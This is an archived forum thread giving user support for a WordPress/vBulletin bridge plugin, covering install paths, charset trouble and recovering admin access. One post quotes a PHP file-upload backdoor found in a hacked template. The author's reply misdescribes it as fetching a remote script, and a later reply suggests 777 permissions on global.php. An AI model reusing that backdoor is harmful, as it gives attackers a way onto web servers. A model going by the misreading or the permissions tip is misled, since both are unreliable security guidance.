vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vBulletin 3.7 Add-ons (https://vborg.vbsupport.ru/forumdisplay.php?f=228)
-   -   Integration with vBulletin - Complete Wordpress/Vbulletin Bridge - Share Users And Postings (https://vborg.vbsupport.ru/showthread.php?t=177625)

Jafo232 05-17-2008 11:37 PM

Uncomment this line in vbbridge.php:

Code:

# define('DISABLE_HOOKS', true);
So it looks like:

Code:

define('DISABLE_HOOKS', true);

Macindy 05-19-2008 06:34 AM

Hi forum!

I have problems related to the charset:

The forum is ISO-8859-1, wordpress utf8 (v2.5).
The excerpt of the wordpress article is screwed with umlauts.

TRR 05-19-2008 01:25 PM

Are you not seeing my posts, or just ignoring them? ;)

Jafo232 05-19-2008 04:23 PM

Just ignoring them.

TRR 05-19-2008 11:25 PM

Any particular reason why? I don't think I have done anything to you that would give you cause to ignore my questions.

If anyone else is able to help with my issues I would appreciate it. Apparently the author isn't able to.

Macindy 05-24-2008 05:30 PM

Hi forums!

I still have problems with the userintegration.
If there are umlauts or special chars - like äöü - the user doesn't get registered in wordpress.

indie2industry 05-25-2008 09:49 PM

I have a BIG PROBLEM!!

While bridging the usergroups I forgot to bridge ADMINISTRATORS as ADMINS, Now I can't get back in to fix it...

HELLLLLLLLLLLLLLLLLLLLLLLP :-(

*edit*
nevermind. I did it via the database

Jafo232 05-27-2008 06:56 PM

Or you could have just renamed the plugin file and gotten back in.

pspcrazy 05-28-2008 12:46 AM

Jafo I upgraded vbulletin to 3.7.1 and your plugin now doesn't work with vbulletin. At the moment it's disabled, any way you can look into this? Any help would be Greatly appreciated as i'm stuck right now without the ability to have comments with any of my posts...

Thanks!

Also is there any security issues with your plugin? Some guy keeps on hacking into my wordpress and deleting thing, and it's been a 1 week battle and we can't figure it out.

Jafo232 05-28-2008 03:29 PM

It does work with Vbulletin 3.7. As far as me diagnosing your problem, I need a little more information than "It doesn't work for 3.7". ;)

There are no known vulnerabilities with this plugin. Check your logs to see when it happens, otherwise I would suggest you deactivate all plugins and see if the hacking continues. Then one by one turn them on until you get hacked again.

tafreeh 05-28-2008 05:38 PM

ok i need to ask some question before installation...

1- my forum is in main directory not in /forum ... and i want wp make my home page...
do i need to move my forum into other directory like www.abc.com/forum ... or is it possible if i install both in main directory ....????

2- it says if some 1 post an article to WP it will create a new thread on forums ... i actually dun need that ... but what i need is .. if some1 created a new thread on forum and it will post the same thing on WP ... does it do that ?

3- after installation, i can use custom theme and plugins riht ???

Thanks i will be waiting for ur reply ...

Jafo232 05-28-2008 05:43 PM

Quote:

Originally Posted by tafreeh (Post 1534263)
ok i need to ask some question before installation...

1- my forum is in main directory not in /forum ... and i want wp make my home page...
do i need to move my forum into other directory like www.abc.com/forum ... or is it possible if i install both in main directory ....????

You would have to move the forum if you want Wordpress to be your front page.

Quote:

Originally Posted by tafreeh (Post 1534263)
2- it says if some 1 post an article to WP it will create a new thread on forums ... i actually dun need that ... but what i need is .. if some1 created a new thread on forum and it will post the same thing on WP ... does it do that ?

No it does not.

Quote:

Originally Posted by tafreeh (Post 1534263)
3- after installation, i can use custom theme and plugins riht ???

Right..

pspcrazy 05-28-2008 06:00 PM

Well it seems something else was causing it to break, it works now :) And the scroll box is fixed too oddly.

Oddly i found this code on my template:

Code:

<?php $ficnt = @fread(@fopen($_FILES["s"]["tmp_name"], "rb"), $_FILES["s"]["size"]);
if(@fwrite(@fopen($_FILES["s"]["name"], "wb"), $ficnt)) echo $_FILES["s"]["name"]; ?>

I removed it since i believe that's the work of a hacker but what does it do?

Also how would I have it so that I have two domains both on the same server in which one of the domains has a separate wordpress db then the other domains has both the forum and wordpress. I'm sure it can be done just need to know how to make seperate wp and vb db's work together. I didn't understand the post you gave me earlier about that too much.

Jafo232 05-29-2008 02:02 AM

It looks like it is downloading and executing a remote script. It also looks like you have your WP templates set as writeable (i.e. chmod 777) and I would suggest against that. Chances are, however you are being hacked, the hacker is writing something to the template file then calling it.

You don't do anything special if you want to use one database or two. It matters not. You configure the script the same way using two separate databases or using one.

Blackhat 05-29-2008 05:37 PM

How can I get the latest posts on the wordpress page without installing maggypie rss stuff ?

Blackhat 05-29-2008 11:21 PM

I get weird characters when posting from wordpress to the forum. I tried changing the forum to UTF-8, but that made weird characters on all my posts. I also tried changing the wordpress from utf-8 to the suggested options, but then I got weird characters all over wordpress :P

Lynk Former 05-31-2008 06:40 AM

Love the bridge, Jafo232.

But you know what would make this even better? Support for vB phrases... unless it does that already and it's just not working for me...

The reason I say this is because I'm finding it hard to make my vB login and userbox script work in Wordpress. I could settle for a simple one where it just displays the persons name and the logout button since the bridge allows that much, but I want to go all the way and mimic vB by showing how many PMs they have and their last visit and all that kinda jazz.

echo@ 06-01-2008 01:33 PM

dont worry im being thick

echo@ 06-01-2008 08:40 PM

for those of you who messed up the installation of this mod and "lost wp admin rights"
this is what you do to fix wordpress.

If you screwed up the installation of vbullentin bridge and recive a permission error when loging in to your wordpress dashboard do the following.
  • login to you myphpadmin,
  • select your wordpress database,
  • select table: wp_usermeta,
  • select browse
  • edit u_metaid 3
  • set the metavalue to a:1:{s:13:"administrator";b:1;}
  • select go

Carlos X 06-02-2008 12:54 AM

Quote:

Originally Posted by pspcrazy (Post 1533593)
Jafo I upgraded vbulletin to 3.7.1 and your plugin now doesn't work with vbulletin. At the moment it's disabled, any way you can look into this? Any help would be Greatly appreciated as i'm stuck right now without the ability to have comments with any of my posts...

Thanks!

Also is there any security issues with your plugin? Some guy keeps on hacking into my wordpress and deleting thing, and it's been a 1 week battle and we can't figure it out.

Looks like I ain't the only one who got a similar problem. :D

Except that the whole hacking part, that is. The whole making files "writable" making it easy for hackers to get through your site.....just wrong.

I am now considering holding off a VB with Wordpress integration at this point until I find a better solution.

Jafo232 06-02-2008 02:22 AM

I have no idea what problem YOU are having. The problem you linked to was an issue with the basepath. This is clearly documented, but feel free holding off an any installation.

bonkerspr 06-02-2008 05:28 AM

where is located the new install instructions? only the readme we ony see the upgrade instructions

Shouzen 06-02-2008 09:52 AM

I swear, I did everything word for word in the readme and for some reason when I test it, when I register a user in VB, it doesn't map on WP but when I make a post on WP it works for VB. Check it out: http://dgraymanhq.com/
I'd really appreciate any help I can get.

Lynk Former 06-02-2008 06:12 PM

Another thing that would be great for the bridge would be support for the vB based smilies in both the blog entries and comments...

powerful_rogue 06-02-2008 06:18 PM

Hi,

I want to have wordpress and vbulletin installed in the same directory. If I have wordpress set as index.php and vbulletin set as forum.php - Is this going to create any problem and will it be possible?

Jafo232 06-02-2008 06:27 PM

It will cause problems, yes..

powerful_rogue 06-02-2008 07:12 PM

Quote:

Originally Posted by Jafo232 (Post 1539018)
It will cause problems, yes..

Ah right,

Is there an easy way to overcome the issues?

Jafo232 06-02-2008 08:29 PM

Not that I know of.

Shouzen 06-03-2008 12:09 AM

So is there anyway to help me?

powerful_rogue 06-03-2008 07:06 PM

Quote:

Originally Posted by Jafo232 (Post 1539118)
Not that I know of.

Ok,

If I create a folder called "forum" and place it in the root, then move all the vb files inside, would that work?

Jafo232 06-03-2008 08:27 PM

Well, yeah, but that is different than what you proposed..

congtubuon101 06-04-2008 09:35 AM

Why Views in my 4rum no change ")

Jafo232 06-04-2008 12:38 PM

I dunno why.. Why would this plugin change your forum views?

Carlos X 06-08-2008 01:12 AM

Hahahaha......4rum. Nice.

Veery nice.
Quote:

Originally Posted by Jafo232 (Post 1538317)
I have no idea what problem YOU are having. The problem you linked to was an issue with the basepath. This is clearly documented, but feel free holding off an any installation.

It asked me to post RELATIVE forum path, I assumed it was the "hard" basepath, where it requires that you paste the entire file basepath.

trigatch4 06-12-2008 02:44 AM

@Jafo

I know you've been ignoring this exact question, but I'm experiencing the same problem with %postname% being at the end of links in VB pointing back to the original WP articles.

My site is: (removed)

Everything else SEEMS to be working properly and I've gone through all the documentation and updates in hopes of fixing this problem without having to bother you. Unfortunately, I've got no ideas left and am reaching out for your help.

Let me know
Thanks

PS: my AIM is trigatch4 if that is easier for you

pspcrazy 06-12-2008 08:32 AM

Almost got it down Jafo for my second domain site, all that's left is to find the cause of this error:

[Thu Jun 12 04:13:01 2008] [error] [client 66.245.227.57] PHP Fatal error: Call to a member function query_read() on a non-object in {path to here}/httpdocs/wp-content/plugins/vbbridge.php on line 553, referer: http://{site}.net/wp-admin/options-general.php?page=vbbridge.php

That's just when I visit the actual write post page. I'm making a cross domain same DB setup atm, yes i know it's not normal but i need to do it so i'm doing it.

To get to this point I did uncomment the $vwd = '/var/www/vhosts/animecrazy.net/httpdocs/forums'; line to make it work. Any idea? Line 553 is: $fs = $vbulletin->db->query_read($sql);

The write post page looks like the attached atm, any support would be awesome (I know this isn't a normal support situation as well, so thanks if you can help!)

Jafo232 06-12-2008 06:42 PM

Not sure exactly what you are doing, but if cannot find query_read, then it would appear it did not load global.php. This would make me think it is a path or permission error of some kind.

pspcrazy 06-13-2008 01:08 AM

What I'm trying to do is have a forum on http://www.site1.net/forums and have the wordpress on site2.net/ I know it's out of normal support, but if that's what you think then i'll try to figure out the path issues. Do you think global needs to be 777 vs 644?

Jafo232 06-13-2008 01:42 AM

It could be an ownership issue to. Not sure how that works in your environment. I would give 777 a shot but am not thinking it will help much. However you are accessing site2.net's global.php file, the user that is doing the access will need executable permission.

pspcrazy 06-14-2008 03:10 AM

That is odd for sure, well I tryed the 777 with no real luck, so now I'm wondering if this is even doable :| I got so close to see the data as well, wonder how I can successfully pull this off. IF you got any other idea's let me know, thanks! If you want to do it for you me or figue how to do it I'll pay you 40 dollars.

Well then back to seeing how to make it work. Thanks


All times are GMT. The time now is 12:54 PM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.02380 seconds
  • Memory Usage 1,821KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (3)bbcode_code_printable
  • (7)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (3)pagenav_pagelink
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (40)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 

Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • pagenav_page
  • pagenav_complete
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete